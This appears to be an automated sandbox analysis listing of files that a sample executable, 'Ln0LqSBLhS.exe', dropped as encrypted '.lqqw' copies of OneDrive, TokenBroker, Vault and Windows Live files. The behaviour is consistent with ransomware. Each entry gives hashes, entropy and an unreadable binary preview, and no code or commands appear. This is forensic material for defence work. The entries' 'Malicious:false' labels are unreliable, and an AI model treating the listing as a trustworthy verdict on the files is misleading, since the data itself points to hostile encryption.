                                                                                                                                                                                                    Preview: ..p...i16F.......6..b..Y.2Uq.N...j....1Y.z&.)..4......XXf.....eZ...Azq@p..E....QA.].|.h..0.U%...9]....~.zc-.)[.=..&.@}\}.b..vx.D.55...h......_=....).(....f.Y.E...].".0H...YR9f.\l..jR..o...m.,...z@..DI..5U.?_&k.....S<.*.....7.. ....Ate.."._W.^.r....X.}.z.}..*..8....&...,.......c&.N.J.p..=...W...1.cg^../..-o....Y.A...C..'u....V.[Ro.Y.........Z.P....S...QU)f.....=2X....n.H..j.....a.Y....T.*......({-..n......fo..L.j.S...f).....e..G....J...V.........0..s.l.yL.S...mQm..'..q....Y...vC.M....84.T..........7E_.$..n...s....nc<.t.&$..}..R..i.In`=f[..0..N.BA..nX.=H.....+^r.....HR.S.O0..{$XQ..#X...f...3.q.Wc#{...G)/*.[V..-...]M.i...i.X..N.EG?.....`r..<.7p....S..&k2>.[.6.`.2.qi.8....D.j.C...+..i...7....c..g.....E.......(.8=.##RN.q...g6....V..\.^.....v X<Y.y..\L(m..JB[....%)j.[TE.f..5.Dj..d.P,*.}...=T.2.3k..=s.....)`.,.X...[b.*....."D..#:s....3.8pW....eh....-U.U-)X..a.eg.S.T..i...Tx`\A..Z..*!..y...o.u...Qs..*..H.N....._NZh<..W..9i......w..;....0.b...8D)t.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):673
                                                                                                                                                                                                    Entropy (8bit):7.62845187151093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:AHoQldIL8XWh1hHhBCUyShHOCrW5hKDIWDNjysgIGcii9a:AH7vFWhphHkKXNjxtGbD
                                                                                                                                                                                                    MD5:65ED27F980A7D6A2534DC9629DA21D9D
                                                                                                                                                                                                    SHA1:15A8FAB4ED15ECB6E774600257007C02BA16D75C
                                                                                                                                                                                                    SHA-256:8DD0E46A9ED3872D7D1238B29E4472092CA7B04D8E0BBDC6ABFDE64553C425A2
                                                                                                                                                                                                    SHA-512:F2DDC2CD81E100E9595271B2FCEC611D6BDBA691E67DA1C010AD4B79B1EF4011633F2ED0D8D77A4EFD76819C9EEAB438B6ED0465BEF697F2C84BFD0BA22B33EC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: V..q.?v,?.g<E.<....Q ...n.lO..)x..pj.....3..74*.E..;.$.[.^...6.E.A.q.....Jt.bI.u.{.-.....N_o.[.`.-....z}.;.+...@u..%i..4u....ct(0&~.L@....~..>.P..oR.@kL..@..b....v..B..h9...=*Xa.....n....!.ph.....%.9{....P.y.E..0.e."..{]..^..]M*....?w}S.g....v%SB-.1..d.'.2.~P%...y^."2`...N....Dt..7.4^X.r.UVK.. 8...DT.5%.B...V./T.>.+.x.!.C^C.K.o.Xs...o_{Y<...?..*.QxJJ:..8.n9....A.4.Y.;>...#.....ZO8`'.{?m....r.s..F...A....h..0.....8./...4......:... .D'5.#......g.B.....V'E.Kh.u.r........l-..z..b...K..'..i..T. T.....C...c4.D....+..1..F.....v=.` .~d..#E...<pm(.rN{Z..w...e....o..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\Resources.pri.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4745
                                                                                                                                                                                                    Entropy (8bit):7.962343687014077
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:y4TMtgD28eBZk4rdb911jGxHTKRiAkvsLw1j+9IYDiLPBxEL54llwIGF:yPtgDdaFrdvRGxHTKsJ5B+9WLpxEL54W
                                                                                                                                                                                                    MD5:E11AF36FA335463E21C4B09122578E82
                                                                                                                                                                                                    SHA1:1FD26CF1F34F8DBA81CA83D398655EADC7960609
                                                                                                                                                                                                    SHA-256:271900DB5C386CCC486F0FB974987DCCE9C5A8C5F51DA2C12E672174658D034B
                                                                                                                                                                                                    SHA-512:1D910B801A072D97445D47790DB8641BDD7FFE629049CA18AA3CD7853ABC3AF066EED5640D41EE3833BF22F6CCBA5080A8740229D749E49F147F91F48A8BEEF2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: U.+.Qi...8.e..Jd..,.+.y..... .3..DS..........r...Z.'.....DK..v*...Q..$.0y..J...p.K.~.......Q...~...v.-.O...!..??..gJ@~.e.w....-..kt.....+.0........`....Hz.x..G.f.g...."a.%.p|.I..W.v.9~..==..,..|...2..'.Bm....4..R^.?7..tQ.-RUH&....&..q8....dM....*.[.4..q....&.E.....O...t...p.....=....n.Y.m....I.".......p.....R...@.......e..;(. .v.*..]..J.j.....\....j9.._..r.C..m3t....i,g.......0[..F.....5W1.....0.^.E.....gg.P.O..._Pmoq.....,q.....9n.x......6.c.p..>....Zu?....f.....%..P......d.....1$M..A.. x$...C....<...T.BE..c....G<H...@..PB.dS .r.)#..]../...8.{.N............#....s...k.h.y.n.W.r...'w.V..y...k..,?...t....7].d..._..o..4O...........CA.h,...Ij._6..J...f.%...&.$.8L.y.X.3...)....z(.r|....."]XX.:..g.$#:.....2..#sS.$..$.lS.E...V.@p.T...(..C.-.W.....e..{~/...bU.$...U.L..n.^..R:Wn...'...+...}.K..._w...*..,..%d*m.....+R.+l9|_..da)...U...U.>..t.+.H.{H......0U.R..Xku....."..h.@2.W..aW........P..:3..E:..5........n.o#'..iMd.s..m.}z8..\.v..2./...>z.v.u.{..v.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\OneDrive\setup\ECSConfig.json.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):749
                                                                                                                                                                                                    Entropy (8bit):7.735550757274953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:/nWO/xJl647L3jmeouSccbWAxXn6/igSD8J+U2j/6cqZNI4uVhlyoaJVQZg7ciik:fWOJlRSFrX6aDLycqZC4uVhIokQe7bD
                                                                                                                                                                                                    MD5:0BB30AA29B08726993B181B62B7E52A6
                                                                                                                                                                                                    SHA1:FDD83268F8DAC5BA82950B9B321809BB3D30FA06
                                                                                                                                                                                                    SHA-256:46712133AA09DF67647FA0ACE7CEAEF729D9F3406B11E5DD4E9142FD21E23AFB
                                                                                                                                                                                                    SHA-512:E07EEE9E2ED27242CC4D9E0E8906862DB16D6AB8C6C129630518816448FBE54D9BF609E7F7BF1950B48CF73E983148139494131F0077955B91CE4B29B984099B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: z..O...~x.}....`......k.o.U.V..|.\.%...ZS.#.k.M~.&;1...+..m..Tvl..g...h....B.V..-l..t..0.S_..)......s......y@..L&..2f..%..zGI......2K..FA.AY\c.`.../)..Njm6X'1.@..Q..%O..OJ;/]......s$V..1.V...e'......9..67..0......*=+......)(...Qw|...QS{S...:....U..w_..yX..N. z.Q....5...;....p...>.......Y@..o..!Zz.ny.mc....O.d.K-l......7./a&?}.u......C#O.}..Y5T..:.g...s4:U....w.h.q....ikB..:.h..49.........*0?.......i....;....=a T..EO-..,6...7L.'..B.m..IPY.&..3P[Vy....i`...|.-.....$'7.....-.Au...XM..o...z.~...P..N.,b.^.t..W..'$Z.v.9..'L..T..a...B....F.....:K.....v5.).f.-...i..>^...}..i...X.T)...k..}.Ui....*E..4..d~..I.b...*g...Hf.h....O...)5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2626
                                                                                                                                                                                                    Entropy (8bit):7.91661476347085
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:rDEhI0PitXNQMPoaBAi+eh1WojXCniOVHaxG7/MC/hvDl3bu1xD:HrNtXvPoaB6VHMG7/MC/Xbc
                                                                                                                                                                                                    MD5:3EAC147560C58DD839BEB4443AE4D159
                                                                                                                                                                                                    SHA1:FD0829BBCB67F94648310B6AC7F00CB693833B57
                                                                                                                                                                                                    SHA-256:D38477CC79B002B63D2429410ADCE20E4E722B1FB410B96771FFAC0DF0A58C5F
                                                                                                                                                                                                    SHA-512:DCCFE30281D4615A89E45F50C5CC061220762C4B715B7B9D2BF912D1CED8BE196738CA612AA4856079529A07738B10670C0C052C355C13B3F4EC040EA6871169
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...C..0O....5..n.....!.M..X..Pd.:.= ..Q...M...../.`......&...d..L3~..m....Q....m...}w!*+o.X.....{..<s..S.5..FGcm.....3.Q.."K...N.z.IJ....4.HG..)s..d.u..G....).E...........w:D...sK.m]F...b5..w2e...T:X..G....b...tFV.;{...+..is]2.^41....iTe..K.u..Hu..7.a.=~...j9+"bD._..-....!.....N:..NQwB.....j....T..1.R....{...4.<N.w.}..4.YE.bO?..O.k..VUu...t...n- 4m+...s.,.1%7.n......\..B ..E.3.L<....L.^..A....P..S.E.L@.....n..I.."p.Ys..fK..v.jN..X\i...H..@[.f.F..M.X...h.7...yt.4..L..aj.......-ZF....G....D.`5..SEzcLF..W...#aI8U.o.....^..../....g.3.&LV%..)..'~`vu.y.R......F...u[.r..l.9W....j.kR".o...V........V.'_F.KB..{v.5.....5.G.....5<t..$.......0.n.>@..)...?.S...7.s.7...D..N...zjW..I5'.Sypy)./).Zh....V(.A.~..v......T.....j..v...;.r.}A.h*...J...)..?;...Xi.sZ.g..rF..~e.hr.....WVZa.;..JR..U.%...|d.4#..t@u)C...et~.g..J>./.s....0...(...O+8f.....)..6V.."."]..F...U...~..D$..rZ...z.lGdi.S.Y!.O.4%........h5.3f...e.X...oH.&..o..6.e.^......M......LP.L.....~.z.z...I..(..=...?..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3013
                                                                                                                                                                                                    Entropy (8bit):7.934924400473442
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:CiNzqV0s61oAakd7v/X2cjUEtsR0GTyog+HqVvcNw80dYt1rkbMgRB7sy2frD:ly61oAakd73VQXRfyozHGcj0dAabvRxI
                                                                                                                                                                                                    MD5:EE239A74386FFA4524334A17CD164EFE
                                                                                                                                                                                                    SHA1:88E12928F9D52A079B7B1F117C2DFC472144F84E
                                                                                                                                                                                                    SHA-256:E7C7E8190EF9C6EB9BF163140AC7067AFCADB5DEFD698847C672B029C55A1A42
                                                                                                                                                                                                    SHA-512:EBC25169115E41257269936BEB0238716C894AB407482028FF9B8B24D297F82F262A193F16CFEEC1185BFBFB828FB2DCB9F8969E3BC361DA1CF8CBFE1DDA2B77
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,.V..3..a....;.Uk6........)o....}FQt....Z....c...j~.ZG.!....<:...*$Ea....MI.CGRe:+....... ..Z;..L.N.....K,.I...10..T.h.`.P....Z..W.........7Q..{.d...^#..m.....]4...<*....iQK.{5.}."E.s .I&....r...p...k.N.....+..+.N...a<J.=@F.....v=.....k.`..x...G.+....Z......!..6..T..4.>..+d....vi.3...GO.......I.j....{.....F.l.m........z....jb}..<....@...Y..9..'.^D@Yf.....l6..Jju..P-Gh.bq....0..df.c..c<2.eK...5........w.6....F4.l.H.NwT.....'..q....s....x$&..b.....}..._..g9...o.3.r..r.i..".... ..'y.....Q..c...7..Td..e?o.f.R..../..J.....@.........k.w.^.xU6.m9.........&........lL9.R. ....#D....?"h.g.....A.p>........{I-$.........X....Xr... (..g].........O.~..w}.B..&~.&>hPM,.l...._...F2J.LX.AJ..@p.f...L..}.\.q.....hUjmf.)<.#|...;.D..]7.?B.A...k.6.Hh.C.8Sv.^..,h...C..jX.!..-O. ....nAq=_.7&........'..C\i.PMtJ..625F.4.C...].=....-.|~..G(\.p>.5.!...}<..x.JL..V..)..X....D.e...vb.@R...hg.g@.\.....q..zH.(.....pn...8.....D.....DB....E.|.qM..%........
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1530
                                                                                                                                                                                                    Entropy (8bit):7.832637377636281
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/9w+kAXrkqsiwy2Vo9N/MKzR49erUbxvae0HWYk1ByD8Ehiup83m1cY9CPsydS2j:SAXrnsKAoL/MKzmer+xSWEp83MPCPsyh
                                                                                                                                                                                                    MD5:EF32AF1D6F410C0B41879C81735D0EB1
                                                                                                                                                                                                    SHA1:9AEF785A9116CCA06202E289A9D4D0E777878ECB
                                                                                                                                                                                                    SHA-256:64C70F76E1A21E934D9C5DC90CAABDAD30EA05AB5C864860C364ED0333C4A402
                                                                                                                                                                                                    SHA-512:68268BF645E9404550A16A6C4B835DA5B12F4372C585DB1AEF204D754AA00F822B36A2F61079888FFEC402D27B5B2447304291BA568550DE176EACC88C9BE153
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .R..#..E.x.?%P...z....ZQ.......@..9.....D.x&...V...-.|..E.....=nz...+.;..t.....I~!!H8.V.+C........z.S..j.+.+~.`...d..H.L4.C...J....2.....Q..Z_.H..y..._....n.. .?p m..>?u..P....{..yv..Y.. u...=..hU.F....|........+..P.^4. ....5.B.]X)GE...@. .h.....4...<./(...o..@......a.Z...D..g.?|.&.P......nE^...7...Y.....!/.o.......q*#. ..C...OM....,&P..B.{. K..<..4..V/.....@....|...6U._.4u......V...i....<h3.).(.+}[e....'..b#......TP.#:.b..4.=.;..i.(.... ...93N48.'....3_.g+=......l.Ir...k..J.......... .)..*.d..E..q.....G..LD5...........m.......~.C..H..K..6...9a......Dg.j....9........U).....7.M.....o..m.[..J..._.:K..:B....z...+..u-q.eNs....-._L:.x}..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}...TP.....XJ3...vN.rd*.?X2..(.....t....e..Z.....A.ym.w..U.w'EK;@w..99\...ui../..p....A.bjFd..;.n{C..Y.k..L..yd.#...W..Y\(..3i..0.k....znb*Ub.0..1....Jl.v.q+.|..F......Ts.*._.7i..0......`.0.......J...?;lR..z..A..@L.-..V.'...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_00.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1747
                                                                                                                                                                                                    Entropy (8bit):7.880975656350571
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:mpeN6WFDIVkEuODYrHHdTip5J1B+IOFbIQtttD:moNvJE3DAHHdepmFcQtD
                                                                                                                                                                                                    MD5:E33AAAE2362854CA06092E800ECA5685
                                                                                                                                                                                                    SHA1:614B036F348222CB3582030F4D4156BE5D5A0631
                                                                                                                                                                                                    SHA-256:99548443A2AF420067C316A7AF982F2BEE10D04573F91F01F112C7789E817ED2
                                                                                                                                                                                                    SHA-512:526A4C24D6236420BF86337FC9E3DD42C7D24346FF76AA58157C1CF3862E739B238494AE97BB01FE030FBE511EC1777CEA8FE3FD62584BBA224E2C81D11ED5B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..3.A..f.V...*F.;..7...g.Z.J)..V(.x<... ..DFC0..A......`..}./w.)@..r..Rs...p.y .d....s.w..B3|Lk.[k.q.%.j..="ZN~.7.7.......'.}`j.......2.:....~.6o.P...S.?$....Q?..x.q>.....{...^... .t...K.....N....2........7.>.g...*.K:.d...bY.r...t...c..}...=v........"..y.D.....c.n.u<-....p$^."....R.....)p.{0T..#cc(N:.........%..[..c....0.....G.l.F.....0u....;.....aw^v.+......f..(%.@0.....&.j.3!Z.5Q..D.=..-~.*...V......VY/....b...n...J.2{....E.[..g8.uq..@...d.....k....p.......zQ..~A.F6i..V....D.(.,.kb....[.....o..._.3..7.y>..'.c5.R[>..c.W.).`;_kY.R..?.e..M....x.~c..d.M..:..G.zI]<.JE...5..|b.........MA..'.o.l..66.W.@+?.L.........MWu.^.S......2+E.;*y.<..^.........7..d.....X...........c.....t.V..[..x..dN...DL.t.(v....Nj....@ ....B......r..Rm.......$......a.....5+.N-.+>l'.:...u.y..C.0H^..Z%..W......9J.y..H. ".q.>..O..@X...d....GThW....I.m.<..gh;......{.{.o.m.3.e.&%....H\.u..3A......D.1..o_..i.sC...Q...1..g.p..fN.l.C....>B-P.5E..>...}h...K..d<..&0m..{.>t..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_01.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1135
                                                                                                                                                                                                    Entropy (8bit):7.810003710811573
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YPQ3Wy4V2yNLknfiRoBd4SECovF0mLr71H/obvnAUFJr8h6+Aw9PwCQZXbD:oQ3Wp7NLk6O+phvZpfXiJry6+Aw9PwdJ
                                                                                                                                                                                                    MD5:F53AA1F2B706416B4CEFE7166DAED688
                                                                                                                                                                                                    SHA1:8F5BA01AC2780DE71B6A06E9A70C600453819A21
                                                                                                                                                                                                    SHA-256:0C83441C8F120BBFE84FDD3B776843A5DF782995393B09FE948452FFF78CD98E
                                                                                                                                                                                                    SHA-512:5825ABE0B8A8D350EC880E1DB79F73DC51DA3DC2600408BA6B3C53D32B49F3A27EE99D255CA7F950F642CE6AFBFB8B07226DCF84F6D98464CDA6B3E1F6383E3B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: m.$Q.......q...XbH......p.O.....pv....=:$o....,c"{Ari}.=~(.....j.1!G...m..`.#..r>....>.w.!.n}$.*.Cqht)."Z....m.=Y..m7..&G.....U..$Nc.<.=....*4.'3$d.+vq.......k{....|....0._z.1.S....1v.....H...+....]....^..+.....6...?...w...h1..JR....1....N.O.0X.&....#Tf.ah.i..O.M....Y.*X".....B........|-...>.W..G...<5..Fd..-p.*...;).U......ok..+...s.......h1.Sz....7e."..."..g#P.]..>.i([#B..QR.gT..?.aKy.9..^.].".l.W.T...<.....H... .,w.4..\.awB.R...8....3.(.KG=..H.K....\..o.d.+.h?VN}7BR.<......(..).;.t..h....@..P.-.,...4..e.^.R.....S.Hhr.f.l..;cZc......TX..L......(...^3.8.......kE..:...Q..S.T.t]#..zo9..^..P...0....>).{z..U.......d.Y......4..0.+I...#Q....F...1}.Fol.dg.3..p....OR..5....7w9^.r.....B~;..5.......%...9.T3J.<......*.Wr.?..&....j...l..wM..G.~<.U).Z.P.H.$.x..$M/.y^o..[..*....4C...L...f..{.B..2,...4.C.f...&.j.....7.$.h...-7.C.;'.2...].L....*.t.. .5Z.....7.m...+0..7..9j.s..T..2.pP ...l65.E..M.}....`Bj..FW..!o4.&.......5......y.....z...U....WR-F.T
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_02.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1033
                                                                                                                                                                                                    Entropy (8bit):7.805393295089041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wrS8j6vEuzAaFsurhgedsUxmEyU9J/3nIfChbD:wVjEEuTT9gY46J/I+D
                                                                                                                                                                                                    MD5:3840D24F9F7040452025FFD0AB6B8025
                                                                                                                                                                                                    SHA1:738AAFDABD62AF6F78FB8F9700FBE45D05FEB7B2
                                                                                                                                                                                                    SHA-256:2E9CA26BD873A06A3FD3025D9588906262A5EF1BF7BDCB529E4BD48F29CFFB72
                                                                                                                                                                                                    SHA-512:D7D84EC2DDC1AFCE183F7F28F564A827B43010D4ABD5FE2087158663CD275489BEF19363D20F42DD8D120F9FED8C7C4E4C89D9C3DF04FA945A3C9F35EF5E7E99
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..5..#B.=...S.*h27.X..L_V..m.Re...i.p..W,.^...'...&..4..l..3p%..'..H.".i.i.....#...?U...lao 7..7A).V.8.8]d......bP..k.5..z...on....v.........Z..9..A~.J.....5...R.~..&?.TmV.6.....+..dT..3..p...0....e.j...F.#bN.3.*.]*%4.=.a."..,p6e.*G.$F..l....3.......c..K.6.y............T.Vz..Mc.Y.zXB.]L.........R..E+,!..:.F.a......!.qb.&..=b.....>3......z.. .zZ...So1.>...-.7.T....O.1.]...p....f.q...^.9.O..+......%,.7.;_...o.!lV.....x"KW.;.....F\..XF..6....>.#..n...2u...1..:.H....Y......X..'._........rgP.B....d...{.q.......:9.].....P.A....M.lJ....(.qPu..kZ.}.o...f....S.....h.(~T.T.q..,...:V/.z7..v....|..J...a...Z.l.V.y...O....f.:...YAH.G...J..f.Y.....Qdin....;...v.).=..m.!..&........(35J.........._f.U(.f........?.l.._eS..s... Hl!`..$....n..K...2...i..K.%.T.g...k.M`d'...i.yB..".5...[/.D*.2s.m:...IG...2m@.....N....g.s9s...IX.a*Yo.=....!N"..$.. .O1.f..:rV|.`.;.}.-..LU.<<...>.D./...V.../...^.\`..d.h#..D5.z/+.Vl"...C5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A6
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_03.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1225
                                                                                                                                                                                                    Entropy (8bit):7.801364397482789
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:nTEgwLp0UO/lzvM1We14R2jEGSGQtlIEkCAMHawVJzeMCbW7cSDvgg7bD:n3MXspOWe14IovtNVHawVOIog/D
                                                                                                                                                                                                    MD5:DBD2645AB8DDF9AD7CFA038BBB966364
                                                                                                                                                                                                    SHA1:BB3686DC1C147B60EFF9BDAE759745621F89212E
                                                                                                                                                                                                    SHA-256:B67E277A94BAF0BE83E7F9FE41C049A1ABDF048437DB1C9B5896129149EC04E0
                                                                                                                                                                                                    SHA-512:F6E5D76016CF2BF131C14234F5699382442BD9ED1DE61B10E9DE29EFA46B0B4A06787E3C4240F6B781AC201DD556AA18DE0B91488F7124DCDA0114198826B62E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...u.?.a..e....C..PY..EW.JO(.v3.?.Z...iL0....v..%!._...A.!%h.....+.............6.@....EG...G..fy...2i..........1;.e.ul.8....b.........jU..2..J..D..Q......l..J\NQ.=...~.u:Nr.<Q..G.[,.!..u...o-f.@....@(...x;...`5.......8nb.....1x]..l=RO......R4'"c..K^8......8zF/....g..{f..xc;gd.)....*...C.u?....w.4P...42."..x5....Lu.0...qK.So.l...I........N|.4_.[..E.......ww..]....'..@e3U..X2Le.........'.T.....a.gQ...|.y.z...(.eg.v....[..0`..>.@..HU).....t/..E6`.!.X..#r. 9zj.9js}.q..~....).t[ _'w.!...l*......>..[...p...].._........2..6......jy.C... ....l.....F.v......Y!....D.=.6..._.~.e..#!c...5..;.f.p/.!@E.'...fO!...o{.oR...V..sq[..O.|H.y<.Q......0;(vmT..-@.lS..9.5.y...d.i?..<x......\ac;](J...&.&.......kU.z..O..r....S..R.q.R3..\........"&..xyP[...2)6...+.&39,L(.~j.CC.v..P)........6|x.Oa.....)..Ed.F.8E...b...x.GPsL.S......o5E.....vS..YN}..'>l..d....|.,..A.....u....u!!l.A....p..s..X......v.rT.....ht...........a..)..X.....-{......|..V.../.. ........X......
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_04.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                    Entropy (8bit):7.780848407997952
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:W3l3jipYnnBJu+zevtqcxKa/D6ce2IiZCKGn5bD:W3V7bjzjcwabDe2jZCKE5D
                                                                                                                                                                                                    MD5:BAA9865143C5884B0163128EE9DF9474
                                                                                                                                                                                                    SHA1:0580CF4E2A16B97A440C31191A506F9399D00F5F
                                                                                                                                                                                                    SHA-256:4C27A4C0330C914F859A8CF9ACBBFA814CF09A90FD65C7D50B4FA4627B925CE5
                                                                                                                                                                                                    SHA-512:7607AE8409FDB476E7B8FF07E90B2C11E06F158A8F09BC2916D11FB1206B29C5D0CF880820AD12BA844D6A92774422069D1095C0B45231277D3D505D41C9BFCA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...o.o......&.{...4.n.....PC...!&8...:.v..D..;..3..m.kV@...f@f.. <s...F.W.Q...yr.:N....Z.,.@..w=3....6...J..uK..iI...&.....>.k\..0..b.. p.&+_........9.[>.6....[.q....`..Sn......G.>.......q.2...A....V" ..%.?..%.....b....}..n...P}...3k..............R.Y...(....~.:...V....1O..k%gb....l..37..,Pu;..........\.N..c2.j.h\....M.....N.Hkf?..|.....B0... ..m.f.6.5..9...{...h6....75...#V.p~v@...A....T.RqQ.Sa-.R.L.L_..{.....clx}....s.N...h..e..bz."....%.\....O4w.....M..5.......%r{.nr/*.t.....<..\ld....w.....{@.Y..........hW.J.?.;..v..,.n.[._...B.or..B.x.T...S......h..;.....>fr......A....A...?.....&Fu..sm..e.+..T...(.....t.......A.iG{...!k...<BC..iS.R1>...h...~FI../...Y...R.`..Y...E.[.............l#..4..I..g....5!/.."...fi4T!p...=.>... .~w....#r..`G2M.g..}.......=3..[.i4.e..S6...w..a.r...../q...e~@Nl..Sak.b.CF.V.x...&....+T\h.....<.DH.E..}.^..:G...=...%dI..^..,#..'.R(3_XW.k...y.5>h.#R.K`4.U'...}[r:.7..Cz....{Y...#.mG.>.=....Rr.t...w....J.A.,7-
                                                                                                                                                                                                    C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_05.sqm.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1073
                                                                                                                                                                                                    Entropy (8bit):7.795966076361011
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:cw4D83mnrCdClDf0rEQhFnQYbPjS0ONNnXbD:aQ3U+dCl0ZQGPjZONxrD
                                                                                                                                                                                                    MD5:0B5576CDAFF261DB65C6F5ACBB328F9F
                                                                                                                                                                                                    SHA1:E804FD17838C619AA919FAF51368DDBBF7CD6643
                                                                                                                                                                                                    SHA-256:5794060AB0B68722E849D08FCF6E9DD59D8CFF8D4EEDF01CB6F324356671CEC3
                                                                                                                                                                                                    SHA-512:F2BFE624E13CACA324CB7CB01AB6CC0E65A3E024868BF085BA639FD6FBC1E6623F785825AD4E1DAFA580B1447A95BC9BBC46F5E1A52FE0434DB1575D2A362C17
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
